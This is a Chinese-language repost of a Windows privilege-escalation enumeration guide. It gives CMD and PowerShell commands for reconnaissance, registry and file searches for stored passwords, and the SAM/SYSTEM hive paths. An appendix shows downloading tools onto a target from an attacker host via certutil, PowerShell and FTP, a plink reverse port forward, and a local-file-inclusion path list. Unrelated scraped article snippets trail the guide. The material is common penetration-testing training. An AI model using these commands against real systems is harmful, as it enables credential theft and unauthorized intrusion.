<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Windows 提權命令指南

    VSole2021-11-08 06:46:03

    介紹

    特權升級總是被歸結為適當的枚舉。但要完成適當的枚舉,你需要知道要檢查和查找的內容。這通常需要伴隨著經驗的豐富而對系統非常熟悉。起初特權升級看起來像是一項艱巨的任務,但過了一段時間,你就開始過濾哪些是正常的東西,而哪些不是正常的東西。最終變得更容易,因為你知道要尋找什么了,而不是挖掘希望在干草堆中找到那根針的所有東西。希望本指南能為你的入門提供良好的基礎知識。

    本指南受到了g0tm1lk發表的基本的Linux提權姿勢的文章的影響,在某些時候,你應該已經看到并使用了該指南。我想試圖反映他的指導,除了Windows。所以本指南主要集中在枚舉方面。

    注:我不是專家,仍然在學習當中。

    指南概述

    在每個部分中,我首先提供老的可靠的CMD命令,然后是一個Powershell實現的的等價命令。同時擁有這兩種工具是非常好的,Powershell比傳統的CMD更加靈活。然而,沒有一個Powershell命令能等價于所有東西(或者CMD在某些事情上仍然更簡單更好),所以一些部分將只包含常規的CMD命令。

    操作系統

    操作系統類型和架構?它是否缺少任何補丁?

    systeminfo
    wmic qfe
    

    環境變量有什么有趣的地方嗎?域控制器在LOGONSERVER?

    set
    Get-ChildItem Env: | ft Key,Value
    

    有沒有其他連接的驅動器?

    net use
    wmic logicaldisk get caption,description,providername
    Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
    

    用戶

    你是誰?

    whoami
    echo %USERNAME%
    $env:UserName
    

    系統上有哪些用戶?任何舊的用戶配置文件沒有被清理掉?

    net users
    dir /b /ad "C:\Users\"
    dir /b /ad "C:\Documents and Settings\" # Windows XP and below
    Get-LocalUser | ft Name,Enabled,LastLogon
    Get-ChildItem C:\Users -Force | select Name
    

    是否有其他人登錄?

    qwinsta
    

    系統上有哪些用戶組?

    net localgroup
    Get-LocalGroup | ft Name
    

    在管理員組中有哪些用戶?

    net localgroup Administrators
    Get-LocalGroupMember Administrators | ft Name, PrincipalSource
    

    用戶自動登錄對應的注冊表中有些什么內容?

    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
    Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
    

    Credential Manager中有什么有趣的東西?

    cmdkey /list
    

    我們可以訪問SAM和SYSTEM文件嗎?

    %SYSTEMROOT%\repair\SAM
    %SYSTEMROOT%\System32\config\RegBack\SAM
    %SYSTEMROOT%\System32\config\SAM
    %SYSTEMROOT%\repair\system
    %SYSTEMROOT%\System32\config\SYSTEM
    %SYSTEMROOT%\System32\config\RegBack\system
    

    程序,進程和服務

    系統都安裝了些什么軟件?

    dir /a "C:\Program Files"
    dir /a "C:\Program Files (x86)"
    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
    Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
    

    有沒有權限設置的比較脆弱的文件夾或文件的權限?

    在程序文件夾中(Program Folders)有哪些文件或文件夾賦予了所有人(Everyone)或用戶(User)的完全權限?

    icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
    icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
     
    icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
    icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
    

    修改程序文件夾(Program Folders)中的所有人(Everyone)或用戶(User)的權限?

    icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
    icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
     
    icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
    icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
    Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
     
    Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
    

    你也可以上傳Sysinternals中的accesschk來檢查可寫文件夾和文件。

    accesschk.exe -qwsu "Everyone" *
    accesschk.exe -qwsu "Authenticated Users" *
    accesschk.exe -qwsu "Users" *
    

    系統上正在運行的進程/服務有哪些?有沒有暴露的內部服務?如果是這樣,我們可以打開它嗎?請參閱附錄中的端口轉發。

    tasklist /svc
    tasklist /v
    net start
    sc query
    Get-Process | ft ProcessName,Id
    Get-Service
    

    是否存在任何脆弱的服務權限?我們可以重新配置什么嗎?你可以再次上傳accesschk來檢查權限。

    accesschk.exe -uwcqv "Everyone" *
    accesschk.exe -uwcqv "Authenticated Users" *
    accesschk.exe -uwcqv "Users" *
    

    有沒有引用的服務路徑?

    wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
    

    是否設置了計劃任務?任何自定義實現的計劃任務?

    schtasks /query /fo LIST 2>nul | findstr TaskName
    dir C:\windows\tasks
    Get-ScheduledTask | ft TaskName, State
    

    系統啟動時都運行了些什么?

    wmic startup get caption,command
    reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
    reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
    Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
    Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
    Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
    Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
    Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
    

    AlwaysInstallElevated是否啟用?我沒有跑過這個,但沒有傷害檢查。

    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    

    網絡

    連接到了哪一塊網卡?是否有多個網絡?

    ipconfig /all
    Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
    

    我們有哪些網絡路線?

    route print
    Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
    

    ARP緩存中有什么?

    arp -a
    Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
    

    是否有連接到其他主機的網絡連接?

    netstat -ano
    

    hosts文件中的任何東西?

    C:\WINDOWS\System32\drivers\etc\hosts
    

    防火墻是否打開?如果是又是怎樣配置的?

    netsh firewall show state
    netsh firewall show config
    netsh advfirewall firewall show rule name=all
    netsh advfirewall export "firewall.txt"
    

    任何其他有趣的接口配置?

    netsh dump
    

    有沒有SNMP配置?

    reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
    Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
    

    有趣的文件和敏感信息

    這部分內容的命令輸出可能有點雜亂,所以你可能想把命令的輸出重定向到txt文件中進行審查和解析。

    在注冊表中是否有任何密碼?

    reg query HKCU /f password /t REG_SZ /s
    reg query HKLM /f password /t REG_SZ /s
    

    查看是否存在沒有清理掉的sysprep或unattended文件?

    dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
    Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
    

    如果服務器是IIS網絡服務器,那么inetpub中有什么?以及任何隱藏的目錄?web.config文件?

    dir /a C:\inetpub\
    dir /s web.config
    C:\Windows\System32\inetsrv\config\applicationHost.config
    Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
    

    在IIS日志目錄中有些什么文件?

    C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
    C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
    C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
    C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
    

    是否安裝了XAMPP,Apache或PHP?任何有XAMPP,Apache或PHP配置文件?

    dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
    Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
    

    系統中是否存在任何Apache網絡日志?

    dir /s access.log error.log
    Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
    

    系統中是否任何有趣的文件?可能在用戶目錄(桌面,文檔等)?

    dir /s *pass* == *vnc* == *.config* 2>nul
    Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
    

    系統中是否有包含密碼的文件?

    findstr /si password *.xml *.ini *.txt *.config 2>nul
    Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
    

    附錄

    傳輸文件

    在特權升級過程中的某個時候,你需要將文件放到你的目標上。下面是一些簡單的方法來做到這一點。

    Powershell Cmdlet(Powershell 3.0及更高版本)

    Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
    

    Powershell一行代碼實現方法:

    (New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename")
    

    Powershell腳本

    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
    echo $file = "output-file.exe" >>wget.ps1
    echo $webclient.DownloadFile($url,$file) >>wget.ps1
    

    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

    通過文本文件的非交互式FTP。當你只有有限的命令執行時這很有用。

    echo open 10.10.10.11 21> ftp.txt
    echo USER username>> ftp.txt
    echo mypassword>> ftp.txt
    echo bin>> ftp.txt
    echo GET filename>> ftp.txt
    echo bye>> ftp.txt
                 
    ftp -v -n -s:ftp.txt
    CERTUTIL
     
    certutil.exe -urlcache -split -f https://myserver/filename outputfilename
    

    轉發端口

    這對于暴露機器外部不可用的內部服務非常有用,通常是由于防火墻設置。

    上傳plink.exe到目標。

    在攻擊機器上啟動SSH。

    例如要公開SMB,在目標上運行:

    plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
    

    注意:從Windows 10的秋季創作者更新版本開始,OpenSSH已經在Windows的beta版本中推出,所以我預計有一天我們可能只能使用普通的舊的SSH命令進行端口轉發,具體取決于是否啟用。

    本地文件包含列表

    這不是一個詳盡的列表,安裝目錄會有所不同,我只列出了一些常見的文件路徑。

    C:\Apache\conf\httpd.conf
    C:\Apache\logs\access.log
    C:\Apache\logs\error.log
    C:\Apache2\conf\httpd.conf
    C:\Apache2\logs\access.log
    C:\Apache2\logs\error.log
    C:\Apache22\conf\httpd.conf
    C:\Apache22\logs\access.log
    C:\Apache22\logs\error.log
    C:\Apache24\conf\httpd.conf
    C:\Apache24\logs\access.log
    C:\Apache24\logs\error.log
    C:\Documents and Settings\Administrator\NTUser.dat
    C:\php\php.ini
    C:\php4\php.ini
    C:\php5\php.ini
    C:\php7\php.ini
    C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
    C:\Program Files (x86)\Apache Group\Apache\logs\access.log
    C:\Program Files (x86)\Apache Group\Apache\logs\error.log
    C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
    C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
    C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
    c:\Program Files (x86)\php\php.ini"
    C:\Program Files\Apache Group\Apache\conf\httpd.conf
    C:\Program Files\Apache Group\Apache\conf\logs\access.log
    C:\Program Files\Apache Group\Apache\conf\logs\error.log
    C:\Program Files\Apache Group\Apache2\conf\httpd.conf
    C:\Program Files\Apache Group\Apache2\conf\logs\access.log
    C:\Program Files\Apache Group\Apache2\conf\logs\error.log
    C:\Program Files\FileZilla Server\FileZilla Server.xml
    C:\Program Files\MySQL\my.cnf
    C:\Program Files\MySQL\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
    C:\Program Files\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
    C:\Program Files\MySQL\MySQL Server 5.1\my.ini
    C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
    C:\Program Files\MySQL\MySQL Server 5.5\my.ini
    C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
    C:\Program Files\MySQL\MySQL Server 5.6\my.ini
    C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
    C:\Program Files\MySQL\MySQL Server 5.7\my.ini
    C:\Program Files\php\php.ini
    C:\Users\Administrator\NTUser.dat
    C:\Windows\debug\NetSetup.LOG
    C:\Windows\Panther\Unattend\Unattended.xml
    C:\Windows\Panther\Unattended.xml
    C:\Windows\php.ini
    C:\Windows\repair\SAM
    C:\Windows\repair\system
    C:\Windows\System32\config\AppEvent.evt
    C:\Windows\System32\config\RegBack\SAM
    C:\Windows\System32\config\RegBack\system
    C:\Windows\System32\config\SAM
    C:\Windows\System32\config\SecEvent.evt
    C:\Windows\System32\config\SysEvent.evt
    C:\Windows\System32\config\SYSTEM
    C:\Windows\System32\drivers\etc\hosts
    C:\Windows\System32\winevt\Logs\Application.evtx
    C:\Windows\System32\winevt\Logs\Security.evtx
    C:\Windows\System32\winevt\Logs\System.evtx
    C:\Windows\win.ini
    C:\xampp\apache\conf\extra\httpd-xampp.conf
    C:\xampp\apache\conf\httpd.conf
    C:\xampp\apache\logs\access.log
    C:\xampp\apache\logs\error.log
    C:\xampp\FileZillaFTP\FileZilla Server.xml
    C:\xampp\MercuryMail\MERCURY.INI
    C:\xampp\mysql\bin\my.ini
    C:\xampp\php\php.ini
    C:\xampp\security\webdav.htpasswd
    C:\xampp\sendmail\sendmail.ini
    C:\xampp\tomcat\conf\server.xml
    轉自:https://zhuanlan.zhihu.com/p/33635377?utm_source=wechat_session&utm_medium=social&s_r=0
    
    configxampp
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Windows 提權命令指南
    2021-11-08 06:46:03
    介紹特權升級總是被歸結為適當的枚舉。但要完成適當的枚舉,你需要知道要檢查和查找的內容。這通常需要伴隨著經驗的豐富而對系統非常熟悉。希望本指南能為你的入門提供良好的基礎知識。
    打印所有可用的系統信息。查看系統內核架構。列出系統上的所有組。當前用戶所在的組。#查看是否存在空口令用戶。誰目前已登錄,他們正在做什么。命令用于顯示系統中有哪些使用者正在上面。[^可以看到yokan用戶在sudo組里]:3、用戶和權限信息whoami????????可以使用sudo提升到root的用戶。當前用戶可以以root身份執行操作。顯示所有的環境變量。顯示默認系統變量。查看etc下所有配置文件。#查看指定應用的安裝版本
    從2023年9月30日開始,SentinelOne觀察到一伙威脅分子利用Progress的WS_FTP最近披露的漏洞,攻擊運行該軟件高危版本的Windows服務器。兩個最嚴重的漏洞是CVE -2023-40044和CVE -2023-42657,CVSS評分分別為10分和9.9分。
    raspi-config是一個用戶空間工具,它允許我們配置樹莓派的各個方面,其中之一是啟用各種外部接口。我們將使用raspi-config來啟用UART接口,首先啟動工具,如下所示: sudo raspi-config 這將導致出現以下結果:
    0X00 原理原理就是,讀取本地微信文件夾中的config目錄下的AccInfo.dat文件AccInfo.dat文件內容如下圖這個Dat文件中包含了手機號,微信ID,微信號,昵稱和城市,綁定郵箱等信息0X01?福州,龍巖,南平,寧德,莆田,泉州,三明,廈門,漳州。白山,白城,長春,吉林,遼源,四平,松原,通化。撫州,贛州,景德鎮,九江,吉安,南昌,萍鄉,上饒,新余,鷹潭,宜春。鞍山,本溪,朝陽,大連,丹東,撫順,阜新,葫蘆島,錦州,遼陽,盤錦(PanJi
    Todesk在安裝目錄下會生成一個config.ini配置文件,存儲的有設備代碼、臨時密碼、安全密碼以及登錄用戶和密碼等重要敏感信息,但密碼都經過Todesk特有的加密算法加密,所以不能通過解密得到明文密碼,只需要去替換這個配置文件,然后重啟服務即可。
    Java內存馬注入工具
    2022-01-16 06:57:58
    一個可以復活的Java內存馬 用法 1.先根據環境修改配置文件 配置文件位置在: agent_starter.jar內部config目錄下 # 目標url IP地址可以是127.0.0.1。在web應用關閉時,會掛起一個新進程用于監聽。當web應用重新啟動后,會自動重新注入。 target_url=http://127.0.0.1:80/ # 連接密碼的md5值 默認密碼:Jundead pas
    修改 ssh 登陸配置打開 ssh 配置文件vim?#更改SSH端口,最好改為10000以上,別人掃描到端口的機率也會下降。防火墻要開放配置好的端口號,如果是阿里云服務器,你還需要去阿里云后臺配置開發相應的端口才可以,否則登不上哦!
    用于紅隊快速收集頂級域名或者ip相關關聯的資產
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类